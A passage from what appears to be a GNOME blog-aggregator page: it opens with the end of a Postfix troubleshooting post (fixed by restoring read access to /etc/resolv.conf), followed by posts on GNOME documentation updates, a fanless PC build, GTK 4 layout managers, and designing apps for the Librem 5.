127.0.0.1:10025 inet n - n -      -  smtpd -o content_filter= -o local_recipient_maps= -o relay_recipient_maps= -o smtpd_restriction_classes= -o smtpd_delay_reject=no -o smtpd_client_restrictions=permit_mynetworks,reject -o smtpd_helo_restrictions= -o smtpd_sender_restrictions= -o smtpd_recipient_restrictions=permit_mynetworks,reject -o mynetworks_style=host -o mynetworks=127.0.0.0/8 -o strict_rfc821_envelopes=yes -o smtpd_error_sleep_time=0 -o smtpd_soft_error_limit=1001 -o smtpd_hard_error_limit=1000 -o smtpd_client_connection_count_limit=0 -o smtpd_client_connection_rate_limit=0 -o receive_override_options=no_header_body_checks,no_unknown_recipient_checks
policy      unix  -  n  n  -      2  spawn user=nobody argv=/usr/bin/perl /usr/share/postfix/policyd-spf-perl

I fear I’m missing something really obvious, but I’ve been googling for two days, running all kinds of tests, and now I don’t know what else to try.

Thanks in advance.

Postscript:

Well, this is embarrassing. As I predicted my problem was caused by the most obvious and trivial reason: lack of read access to /etc/resolv.conf for the postfix user o_0

As you probably know, the Postfix subprocesses (smtp, smtpd, qmgr, etc.) run as the postfix user. All the comments and suggestions I received were related to problems accessing DNS resolver data, and the usual suspects were SELinux or a chrooted Postfix. You were all right about the underlying cause. Following one piece of advice, I tried:

# sudo -u postfix -H cat /etc/resolv.conf
cat: /etc/resolv.conf: Permission denied

So… What??

# ls -l /etc/resolv.conf
-rw-r-----. 1 root named 118 mar 28 20:34 /etc/resolv.conf

OMG!… Then, after a chmod o+r and a Postfix restart, all the email on hold was processed and sent, and new mail is handled as expected.
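For the record, the complete fix boils down to this (assuming a systemd-based setup, as on this CentOS 7 machine):

# Restore world-read access so the Postfix subprocesses can read the
# resolver configuration, then restart Postfix to clear the queue.
chmod o+r /etc/resolv.conf
systemctl restart postfix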

I doubt I changed the resolv.conf read permissions myself, but I can’t be 100% sure. So the problem is finally fixed, and I’m very sorry for taking up everyone’s attention for such a ridiculous reason.

Thank you all.

Andre Klapper: Updating some GNOME 3.32 user documentation

Enj, 28/03/2019 - 4:51pd

Apart from replacing many broken links to git.gnome.org and replacing links to GNOME Bugzilla with links to GNOME Gitlab in many code repositories and wiki pages, over the last few months I have spent a good amount of time updating random GNOME user docs all over the place:

  • The user docs for Rhythmbox 3.4.3, GNOME Chess 3.32, five-or-more 3.32 and four-in-a-row 3.32 should be up-to-date.
  • The Totem 3.32 user documentation is up-to-date and now in Mallard format, based on work started in 2013 by Magda and Kat.
  • The screenshots in the user help of gnome-klotski, simple-scan, swell-foop, tali, and zenity are up-to-date.
  • Hopefully updated all the places that mentioned an application menu that has since been replaced by a menu button.
  • Removed a bunch of unused help images that some repositories shipped for no reason, bloating tarballs.

Enjoy and check the GNOME Wiki if you are interested in working on user documentation!

Olav Vitters: New computer

Enj, 28/03/2019 - 12:50pd

Shortly after I assembled my current/old pc, the older pc died. I intended to have two and ended up with only one: my NUC. With memory prices slowly dropping to more affordable levels, I decided to assemble a new pc. I tried to go for components with good price/performance; I don’t want to spend 50% more for maybe 10% more performance. Besides price/performance, I opted for an AMD CPU because Intel has so many more security issues. I went with a 1TB SSD (SATA, because of price/performance), a 65W TDP AMD Ryzen with integrated GPU, a mini-ITX motherboard with good 5.1+ sound, plus a fanless case. PSU-wise, I found a laptop-like PSU/charger which needed a DC-DC converter. The result is an utterly quiet pc. I did a stress test and checked the temperatures; everything seems ok, though I wonder how things will be during summer. I quite like the lack of any noise.
My existing older pc is a NUC with a slowly spinning fan. I noticed a company making fanless cases for pretty much all NUC models. I’m wondering whether to make my existing NUC fanless, or maybe do something else.

Installing Mageia was annoying: the latest stable release didn’t work, and the latest beta was the same. Eventually I ended up installing it over the internet (net install).

Before buying all the components I wasn’t aware that something fanless existed for such a CPU. It’s nice to do the research and build a pc which mostly follows the tips I found, my preferences, and the trade-offs I had to make. Price-wise I spent about 800 EUR on the various components (I didn’t list all of them). In case people want to know the exact components, I’ll put them in the comments (update: I had to put them under the “more” link). I’m trying to avoid making this appear to be an advertisement.

I’m going to link to a Dutch price comparison website for most items.

    • CPU: AMD Ryzen 5 2400G Boxed
In Q2/Q3 2019 AMD will release newer Ryzen CPUs. I stopped caring about getting the latest each time.
    • Motherboard: ASRock Fatal1ty B450 Gaming-ITX/ac
    • Case: Streacom FC8 Alpha Fanless (without space for CD/DVD/Blueray reader)
    • Memory: G.Skill Aegis F4-3000C16D-32GISB
This memory arrives without a heat sink. I bought 2 types of heat sinks from AliExpress. They’re yet to arrive, so I haven’t listed them. A heat sink might not be needed, but I’d rather be careful.
    • SSD (M.2 format using SATA): Crucial MX500 m.2 1TB
    • Pico PSU: Mini-box picoPSU-150-XT
I bought this for 42.50 EUR incl. shipping; the current price is way higher. You’ll probably want to search around for better prices. I wasn’t sure whether to get the 150 Watt or the 120 Watt version. I noticed some people reporting stability problems with 120 Watt, though that could be due to heat instead of power. The integrated GPU can be power hungry; I doubt I’ll ever use something GPU-intense.
    • Power supply: Leicke ULL PSU Power Supply 150W
This is significantly cheaper on Amazon UK than Amazon DE. For me the UK one came with an EU power plug and was sent quickly from Germany. I was expecting to get a UK plug and then use a spare ‘monitor’ cable to make it work.
    • Better thermal compound: ARCTIC MX-4 2019 Edition – 8 gram
      Use keepa.com plugin for your browser to compare the prices across Amazon sites. Amazon was cheaper than any price comparison site.
    • ATX 90 degree power adapter: Mainboard Motherboard ATX 24Pin to 24Pin 90 Degree Power Adapter Connector
      This bit hasn’t arrived yet. I added this to ensure there is more space between the memory and the pico psu (both sources of heat). Further, the internal USB3 cable from the case is very sturdy. Turning the pico psu 90 degrees will help with that internal USB3 cable, plus optimize heat dissipation.
    • Internal USB3 90 degree adapter: USB 3.0 20pin Male to Female Extension Adapter Angled 90 Degree for Motherboard Mainboard
      Similar to the ATX 90 degree adapter. This is solely meant for making it easier to connect that sturdy internal USB3 cable.
    • M.2 heatsink: Pure Copper Cooling M.2 NGFF 2260 Solid Hard Disk Cooler Heat Sink
      I wanted this due to remarks that a M.2 SSD could run quite hot, combined with the lack of airflow in the case (as it’s fanless). It’s only a few EUR and I wanted to be on the safe side.
      Note: It’s tiny! Despite being for M.2 it’s smaller (5cm wide) than expected. I’m still not entirely sure if it’s needed.

     

    General tips:

    • The power supply and the pico psu/DC-DC converter aren’t 100% efficient. Meaning, 150 Watt from the power supply will be less by the time it arrives at the pico psu, and less again when it arrives at the motherboard. On the other hand, power supplies are really inefficient if they’re underutilized. Meaning, if you only run one at 50% load, the power supply and converter will waste a lot of power. Make sure to pay attention that the voltages are all ok; meaning, that everything accepts the same voltage (12 or 19 Volts seems to be common).
    • AliExpress and Ebay have a lot of questionable Pico PSU/DC-DC converters. They’re cheap, but the reviews made me question buying those. I noticed a lot of sites reselling the AliExpress ones under various brands. Make sure to recognize those AliExpress ones. See for instance the ones sold by RGeek store.
    • I bought 20 grams of thermal paste because a) it has better heat transfer than the paste which came with the case and b) of a comment that there isn’t enough thermal paste with the case. The case came with (I think) 2x 10 grams. I’m pretty sure 8 grams would be enough, and I applied it generously. If you get a less power-hungry CPU then stick with the paste from the case; judging from the specification it’s pretty good as well. The spec showed 5 W/m·K; the one I have is around 8.5 W/m·K.
    • Another price comparison site I know: Geizhals.eu. I also used Google.
    • The Dutch Tweakers.net site allows you to add multiple products and then calculate the cheapest combination of shops including shipping costs (probably only works for .nl, .be). It also gives alternative shop combinations.
    • Fanless NUC cases: Akasa, they also have nice options for motherboards for Intel CPU’s (seems most of those motherboard have a fixed layout).
    • I wanted the pc to be small. My NUC is tiny; the new pc is still huge in comparison. You’re paying a significant premium to use small components. If you do not go for a mini-ITX sized motherboard you can save a lot on the motherboard. Same for the fanless case: it’s also possible to use a quiet CPU cooler (e.g. Noctua NH-L9a-AM4). The fanless case plus PSU and so on was 200 EUR; there are cases for 40-50 EUR including PSU.

Emmanuele Bassi: Layout managers in GTK 4

Mër, 27/03/2019 - 6:06md

Containers and layout policies have been a staple of GTK’s design since the very beginning. If you wanted your widget to lay out its children according to a specific policy, you had to implement GtkContainer for handling the addition, removal, and iteration of the child widgets, and then you had to implement the size negotiation virtual functions from GtkWidget to measure, position, and size each child.

One of the major themes of the GTK 4 development cycle is to delegate more functionality to ancillary objects instead of encoding it into the base classes provided by GTK. For instance, we moved the event handling from signal handlers described by GtkWidget into event controllers, and rendering is delegated to GtkSnapshot objects. Another step in that direction is decoupling the layout mechanism from GtkWidget itself to an ancillary type, GtkLayoutManager.

Layout Managers

A layout manager is the object responsible for measuring and sizing a widget and its children. Each GtkWidget owns a GtkLayoutManager, and uses it in place of the measure() and allocate() virtual functions—which are going away. The gist of the change: instead of subclassing a GtkWidget to implement its layout policy, you subclass GtkLayoutManager, and then assign the layout manager to a widget.

Just like in the old GtkWidget code, you will need to override a virtual function to measure the layout, called measure(), which replaces the get_preferred_* family of virtual functions of GTK 3:

static void
layout_measure (GtkLayoutManager *layout_manager,
                GtkWidget        *widget,
                GtkOrientation    orientation,
                int               for_size,
                int              *minimum,
                int              *natural,
                int              *minimum_baseline,
                int              *natural_baseline)

After measuring, you need to assign the size to the layout; this happens in the allocate() virtual function, which replaces the venerable size_allocate() virtual function of previous GTK major versions:

static void
layout_allocate (GtkLayoutManager *layout_manager,
                 GtkWidget        *widget,
                 int               width,
                 int               height,
                 int               baseline)

On the more esoteric side, you can also override the get_request_mode() virtual function, which allows you to declare whether the layout manager requests a constant size, or if one of its sizes depend on the opposite one, like height-for-width or width-for-height:

static GtkSizeRequestMode
layout_get_request_mode (GtkLayoutManager *layout_manager,
                         GtkWidget        *widget)

As you may notice, each virtual function gets passed the layout manager instance, as well as the widget that is using the layout manager.

Of course, this has bigger implications on various aspects of how GTK widgets work, the most obvious being that all the complexity for the layout code can now stay confined into its own object, typically not derivable, whereas the widgets can stay derivable and become simpler.

Another feature of this work is that you can change layout managers at run time, if you want to change the layout policy of a container; you can also have a per-widget layout policy, without adding more complexity to the widget code.
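For instance, switching a widget to a box layout policy at run time could look roughly like this (a sketch against the API in master; names may still change before GTK 4 is released):

/* A sketch: swap in a box layout manager at run time;
 * the widget takes ownership of the layout manager and
 * uses it for all subsequent measure/allocate cycles. */
gtk_widget_set_layout_manager (widget,
                               gtk_box_layout_new (GTK_ORIENTATION_VERTICAL));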

Finally, layout managers allow us to get rid of one of the special cases of GTK, namely: container child properties.

Child properties

Deep in the guts of GtkContainer sits what’s essentially a copy of the GObject property-related code, and whose only job is to implement “child” properties for types deriving from GtkContainer. These container/child properties exist only as long as a child is parented to a specific class of container, and are used for a variety of reasons—but, generally, to control layout options, like the packing direction in boxes and box-like containers; the fixed positioning inside GtkFixed; or the expand/fill rules for notebook tab widgets.

Child properties are hard to use, as they require ad hoc API instead of the usual GObject one, and thus require special casing in GtkBuilder, gtk-doc, and language bindings. Child properties are also attached to the actual direct child of the container, so if a widget interposes a child—like, say, GtkScrolledWindow or GtkListBox do—then you need to keep a reference to that child around in order to change the layout that applies to your own widget.

In GTK’s master branch we got rid of most of them—either by simply removing them when there’s actual widget API that implements the same functionality, or by creating ancillary GObject types and moving child properties to those types. The end goal is to remove all of them, and the relative API from GtkContainer, by the time GTK 4 rolls out. For layout-related properties, GtkLayoutManager provides its own API so that objects are created and destroyed automatically once a child is added to, or removed from, a widget using a layout manager, respectively. The object created is introspectable, and does not require special casing when it comes to documentation or bindings.

You start by deriving your own type from the GtkLayoutChild class and adding properties just like you would for any other GObject type. Then you override GtkLayoutManager‘s create_layout_child() virtual function:

static GtkLayoutChild *
create_layout_child (GtkLayoutManager *manager,
                     GtkWidget        *container,
                     GtkWidget        *child)
{
  // The simplest implementation
  return g_object_new (your_layout_child_get_type (),
                       "layout-manager", manager,
                       "child-widget", child,
                       "some-property", some_property_initial_state,
                       NULL);
}

After that, you can access your layout child object as long as a widget is still a child of the container using the layout manager; if the child is removed from its parent, or the container changes the layout manager, the layout child is automatically collected.
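Retrieving and updating the layout properties for a child might then look something like this (a sketch; gtk_layout_manager_get_layout_child() is the accessor in current master, and "some-property" is whatever property your GtkLayoutChild subclass defines):

/* A sketch: look up the layout child for a widget and tweak
 * one of the custom layout properties defined above. */
GtkLayoutChild *layout_child =
  gtk_layout_manager_get_layout_child (manager, child);

g_object_set (layout_child, "some-property", some_value, NULL);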

New layout managers

Of course, just having the GtkLayoutManager class in GTK would not do us any good. GTK 4 introduces various layout managers for application and widget developers:

  • GtkBinLayout implements the layout policy of GtkBin, with the added twist that it supports multiple children stacked on top of each other, similarly to how GtkOverlay works. You can use each widget’s alignment and expansion properties to control their location within the allocated area, and the GtkBinLayout will always ask for as much space as it’s needed to allocate its largest child.
  • GtkBoxLayout is a straight port of the layout policy implemented by GtkBox; GtkBox itself has been ported to use GtkBoxLayout internally.
  • GtkFixedLayout is a port of the fixed layout positioning policy of GtkFixed and GtkLayout, with the added functionality of letting you define a generic transformation, instead of a pure 2D translation for each child; GtkFixed has been modified to use GtkFixedLayout and use a 2D translation—and GtkLayout has been merged into GtkFixed, as its only distinguishing feature was the implementation of the GtkScrollable interface.
  • GtkCustomLayout is a convenience layout manager that takes functions that used to be GtkWidget virtual function overrides, and it’s mostly meant to be a bridge while porting existing widgets towards the layout manager future.

We are still in the process of implementing GtkGridLayout and making GtkGrid use it internally, following the same pattern as GtkBoxLayout and GtkBox. Other widgets inside GTK will get their own layout managers along the way, but in the meantime they can use GtkCustomLayout.
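As a bridge, a widget being ported could wrap its existing virtual function implementations with something like this (a sketch; measure_func and allocate_func stand in for the old GtkWidget overrides, and the exact gtk_custom_layout_new() signature should be checked against the current API reference):

/* A sketch: reuse the old measure/allocate implementations
 * through a custom layout manager while porting a widget. */
GtkLayoutManager *manager =
  gtk_custom_layout_new (NULL, /* use the default request mode */
                         measure_func,
                         allocate_func);
gtk_widget_set_layout_manager (my_widget, manager);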

The final step is to implement a constraint-based layout manager, which would let us create complex, responsive user interfaces without resorting to packing widgets into nested hierarchies. Constraint-based layouts deserve their own blog post, so stay tuned!

Tobias Bernard: Designing for the Librem 5

Mër, 27/03/2019 - 1:53md

So you’re excited about the Librem 5 and GNOME going mobile, and want to start building an app for it. Of course, the first step is to design your app. This can seem quite challenging if you’re just starting out with a new platform, but fear not! In this blog post I’ll walk you through some of the most important UI patterns, and the process of going from idea to mockups step by step. Throughout this I’ll be using a read-it-later app as an example.

The GNOME design philosophy

Before starting to design for a platform, it’s good to familiarize yourself with the design philosophy of the platform. The GNOME Human Interface Guidelines have a “design principles” page which I encourage you to read in its entirety, but will paraphrase a few highlights from here:

Simplicity and Focus — Make sure you have clear goals for your app from the outset, and focus on those. Often it’s better to make a separate application to cover an additional use case rather than cramming too many things into one app (e.g. video podcasts are different enough from audio podcasts to be better off as their own app).

Search and Undo — If there are large amounts of content in your app, provide full-text search to make it easy to find things. Be forgiving about people making mistakes by making it hard to lose data, and never use a warning when you mean undo.

Avoid Preferences — “Just adding an option” often seems like a quick fix, but in most cases you’re just treating symptoms rather than the root cause. It’s better to figure out what that root cause is and fix the problem for everyone, rather than papering over the cracks with a preference. I highly recommend this article by Havoc Pennington on the topic.

Design Process

Now that we’re full of high-minded ideals, let’s jump into the actual design process. Let’s design a great read-it-later app.

We will follow the GNOME design process, which primarily consists of three steps (plus iterations):

  1. Define goals and non-goals for your app
  2. Collect relevant art, i.e. examples of similar apps to borrow ideas from
  3. Make sketches/mockups of the main views and user flows
1. Define Goals

The app we’re designing is going to be a native client for read-it-later web services (such as Pocket). These services allow you to store articles and other web pages that you are interested in, but don’t have time to read right now. That way you can catch up on all the stuff you saved later on, when you have more time. As such, our primary goals are:

  • Listing your saved articles
  • Providing a great, focused experience for reading articles in the app
  • Helping you actually catch up with your reading list
  • Storing articles offline, so they can be read without a network connection

Some non-goals, i.e. things that are out of scope for this application:

  • Social features
  • Content discovery
2. Relevant Art

The next step is to find some examples of existing apps that do similar things. It’s good to look at how other people have solved the same problems, what they do well, and what could be improved before jumping into designing a new app.

So let’s check out the competition:

Pocket on Android (screenshots by me)

Pocket on Android has a lot of features, and a pretty complicated interface. It has lots of categories, social features, a discover section, text-to-speech, and much more. I’ve personally never used most of these features, and they make the app feel quite cluttered. In my experience Pocket is also not very good at helping me get through the list of things I’ve already saved. It feels like it mostly wants me to discover new things to save (and then not read).

Clearly there are some lessons to be learned here for our app.

Instapaper on iOS (screenshots from App Store listing)

I’ve never used the app myself, but judging from screenshots, Instapaper’s UI feels a lot saner and more focused than Pocket. I also really like the rich article previews in the list view and the nice typography.

Wallabag for Android (screenshots from Google Play listing)

Wallabag is a self-hosted alternative to Pocket and Instapaper. This Android client for it (also called Wallabag) is not very sophisticated UI-wise, but it’s a good example of a very simple native client for this kind of service.

Structurally, these apps are all quite similar: a main view with a list of articles, and an article view that just displays the article in a clean, readable format.

Depending on the service, there are multiple lists for different types of articles such as Archive, Highlights, Favorites, Notes, etc. To keep things simple, and because we’re targeting Wallabag first and foremost (since it’s the only self-hosted service), we’re going with only three categories: Unread, Archive, and Favorites.

This means that our application is going to have four main screens we need to design: the three article categories mentioned above plus a reader view, which displays the article content.

3. Sketches/Mockups

Now that we have a basic idea of the structure of the app, we can finally dive into designing the UI. Personally, I like starting off with sketches on paper and then moving to Inkscape for more detailed mockups, but you can use any tool you’re familiar with. You don’t need to be good at drawing or at any particular application for this; just find a way to visualize your ideas that works for you.

If you’re using Inkscape for mockups, you might want to check out the GNOME mockup template which contains some common layouts and patterns to use in your designs. If you are looking for GNOME-style symbolic icons for your mockups, you can find them here, here, and here.

Navigation

When it comes to the layout of an interface, one of the first things to consider is what navigation structure makes the most sense for the type of content you have.

The most common navigation patterns in GNOME apps are the Stack, the View Switcher, and the Sidebar List.

Example of Stack navigation in GNOME Photos

The Stack pattern is when you have completely separate views with no shared UI, and a back button to go back to the overview. This is what Photos does for navigating between the stream of photos and the detailed view of an individual photo, for example. There is a bit more friction to switch between views than with other patterns, but it’s also more focused. This pattern is great for situations where you don’t switch between views a lot.

View switcher in GNOME Clocks

The View Switcher is for cases where there are a small number of views that are equally important or need to always be easily accessible. It’s used in GNOME apps such as Clocks, Music, and Software as the primary navigation. On the desktop, this switcher is always in the headerbar, but there’s work on a new adaptive version of it, which moves to the bottom of the screen for mobile. This is not quite ready yet, but will hit a version of Libhandy near you soon.

Sidebar List in Fractal

The Sidebar List is for cases where there are a lot of views that you need to switch between often. For example, it’s used in Fractal for the room list, because it gives an overview of all rooms and allows for quick context switching. Of course, on mobile there’s not enough space for a content pane and a sidebar, so there is a Libhandy widget called Leaflet, which transforms from a Sidebar List on desktop to a Stack on mobile.

Experimental branch of GNOME Settings using HdyLeaflet to switch between Sidebar List and Stack navigation

For our read-it-later app, we need navigation to switch between the different lists (Unread, Archive, Favorites), and to switch between list and article views.

The former is a small set of views that we want to be easily accessible, so a view switcher is a good fit. Since we can’t use the shiny new adaptive view switcher widget yet, we can use a plain old view switcher in the header bar for now (though we can already design the UI with the new switcher in mind).
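For reference, wiring up a plain view switcher in the header bar takes only a few lines of stock GTK 3 API. This is a sketch; stack and header stand in for the application’s GtkStack and GtkHeaderBar:

/* A sketch: show a view switcher for an existing GtkStack as the
 * header bar's title widget; "stack" and "header" are assumed. */
GtkWidget *switcher = gtk_stack_switcher_new ();
gtk_stack_switcher_set_stack (GTK_STACK_SWITCHER (switcher),
                              GTK_STACK (stack));
gtk_header_bar_set_custom_title (GTK_HEADER_BAR (header), switcher);
gtk_widget_show (switcher);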

For the latter we could either use a stack or a sidebar list (using the Leaflet widget so it works on mobile). Since we want this app to be a focused reading experience and switching back and forth quickly between articles is not a very common use case, a Stack is probably the best solution here.

This means that our main screens will look something like this:

Quick pencil sketch of the layout for the list and article screens

Article List Screens

Now that we have a basic navigation structure we can design the individual screens in more detail. The three article list screens are basically the same lists with different content.

The main purpose of these screens is to provide a nice, legible list of the saved articles that entices people to catch up with their reading list. In order to do this we’re going with a comfortable layout including article title, preview, and some information about the article.

To help people catch up with their saved articles, we should also try to make the content as interesting as possible. A simple reverse-chronological list of saved items is quite boring, and I’ve noticed in my own use that I often scroll down the list randomly to discover older articles. A potential way to build this into the core experience would be to show the reading list in randomized order, and show the most recently saved articles at the top in a separate category. I’ve tried that in the mockups below.

Mockups of the Unread, Archive and Favorites screens (the latter two are structurally identical, though of course in the real app they’d have different content)

In terms of actions, we need to expose search and selection mode (for operations on multiple elements), as well as the application’s primary menu. The primary menu contains global app-level things such as Help, Preferences, and About.

In selection mode we need the ability to move articles to Favorites and Archive, and delete them from our reading list. Since this is not essential functionality though, we won’t be doing designs for it yet. If you want to learn more, have a look at the selection mode page in the GNOME HIG. The same goes for search (relevant HIG page).

Article Screen

The article screen’s job is pretty straightforward: provide a great reading experience for the saved articles. Since many websites kind of suck in this regard, a reader mode (like Epiphany and Firefox have) should be the default view whenever possible. However, since there’s no guarantee that a given article will be rendered perfectly, we need some way to show the website with its native styling when necessary.

We also need a way to move an article to Favorites and Archive, delete it, and share it. The most important actions are usually exposed directly in the header bar, but for less important actions (or if there’s not enough space), we can use a secondary menu.

Mockup of the article screen

Desktop

We now know more or less what the app looks like on mobile, but what about the desktop? As with responsive web design, if you design your app for mobile first, it’s usually pretty easy to make it work well on larger screens too.

In this case, since we don’t have any sidebars or other complicated layout elements, the main change happening at larger sizes is that the content column width grows with the window, until it reaches a maximum width comfortable for reading. This can be implemented by wrapping the content area in an HdyColumn. The view switcher also moves up to the header bar, and there is a close button on the right side.
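Wrapping the content might look roughly like this. This is only a sketch, assuming libhandy’s HdyColumn API at the time of writing; the property name and type should be double-checked against the installed version:

/* A sketch: cap the content width at a comfortable reading
 * measure. "maximum-width" is taken from the HdyColumn docs;
 * verify it against your libhandy version before relying on it. */
GtkWidget *column = g_object_new (HDY_TYPE_COLUMN,
                                  "maximum-width", 600,
                                  NULL);
gtk_container_add (GTK_CONTAINER (column), content_area);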

Desktop mockups of some screens

There’s more…

What we now have is the basic structure and most important screens of the application, but that’s of course far from everything. We don’t yet have designs for login and account settings, empty states, first run experience, errors, search, and a number of other things. I wanted to stick to the basics for this post, but perhaps I could expand on these things in future blog posts if there’s interest.

It’s also worth noting that mockups are never final, and interfaces almost always change during implementation, as you learn more about use cases, the underlying technology, and other constraints. Ideally you’d also do some informal user testing on real people, and get feedback on the design that way.

I hope this has been useful as an introduction to designing apps for the Librem 5 (and GNOME more generally). If you have any questions feel free to drop by on #gnome-design on IRC/Matrix or the Librem 5 apps Matrix room (#community-librem-apps:talk.puri.sm).

If you want to play with the mockups I made for this tutorial, here’s the source SVG.